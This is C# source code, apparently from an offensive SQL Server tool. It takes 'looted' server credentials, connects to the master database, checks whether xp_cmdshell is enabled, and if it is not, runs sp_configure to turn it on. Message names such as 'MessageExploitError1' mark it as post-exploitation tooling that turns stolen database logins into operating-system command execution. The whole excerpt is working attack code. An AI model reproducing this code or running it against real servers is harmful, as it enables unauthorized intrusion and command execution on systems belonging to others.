private void XpCmdShellReConfig() { Dispatcher.CurrentDispatcher.Invoke(new Action(() => { var changeLang = new LanguageControl(); changeLang.FindLang(); Result += Environment.NewLine + changeLang.SelectedLanguage.GetString("XPCmdShell3"); var openXpCmdShell = "EXEC sp_configure 'show advanced options', 1;\n"; openXpCmdShell += "RECONFIGURE;\n"; openXpCmdShell += "EXEC sp_configure 'xp_cmdshell', 1;\n"; openXpCmdShell += "RECONFIGURE;\n"; openXpCmdShell += "EXEC sp_configure 'show advanced options', 0;\n"; openXpCmdShell += "RECONFIGURE;\n"; if (!string.IsNullOrEmpty(LootedServer)) { var parcala = LootedServer.Split(':'); var server = parcala[0]; var user = parcala[2]; var pass = parcala[3]; var conS = "Server=" + server + ";Database=master;Uid=" + user + ";Pwd=" + pass + ";"; try { var conn = new SqlConnection(conS); var cmd = new SqlCommand(openXpCmdShell, conn); conn.Open(); var rdr = cmd.ExecuteReader(); while (rdr.Read()) { Result += $"{Environment.NewLine}{rdr[0]}"; } rdr.Close(); conn.Close(); Result += $"{Environment.NewLine}{changeLang.SelectedLanguage.GetString("XPCmdShell1")}"; cmdControl.isExecuted = true; cmdControl.isActivated = true; } catch (SqlException exp) { if (exp.ErrorCode == -2146232060) { cmdControl.isExecuted = false; Result += Environment.NewLine + changeLang.SelectedLanguage.GetString("XPCmdShell4"); } else { CmdException += string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2")); } } } else { Result += $"{Environment.NewLine}{changeLang.SelectedLanguage.GetString("MessageExploitError1")}"; } })); }
public void XpCmdShellStatus() { var changeLang = new LanguageControl(); changeLang.FindLang(); const string xpCmdShellStatusCommand = "SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell'"; if (!string.IsNullOrEmpty(LootedServer)) { var parcala = LootedServer.Split(':'); var server = parcala[0]; var user = parcala[2]; var pass = parcala[3]; var conS = "Server=" + server + ";Database=master;Uid=" + user + ";Pwd=" + pass + ";"; try { var conn = new SqlConnection(conS); var cmd = new SqlCommand(xpCmdShellStatusCommand, conn); conn.Open(); var cmdResult = -1; var rdr = cmd.ExecuteReader(); while (rdr.Read()) { cmdResult = Convert.ToInt32(rdr[0]); } rdr.Close(); conn.Close(); if (cmdResult > 0) { Dispatcher.CurrentDispatcher.Invoke(new Action(() => { cmdControl.isActivated = true; Result = Environment.NewLine + changeLang.SelectedLanguage.GetString("XPCmdShell2"); })); } else { Dispatcher.CurrentDispatcher.Invoke(new Action(() => { cmdControl.isActivated = false; XpCmdShellReConfig(); })); } } catch (SqlException exp) { CmdException += string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2")); } } else { Result += $"{Environment.NewLine}{changeLang.SelectedLanguage.GetString("MessageExploitError1")}"; } }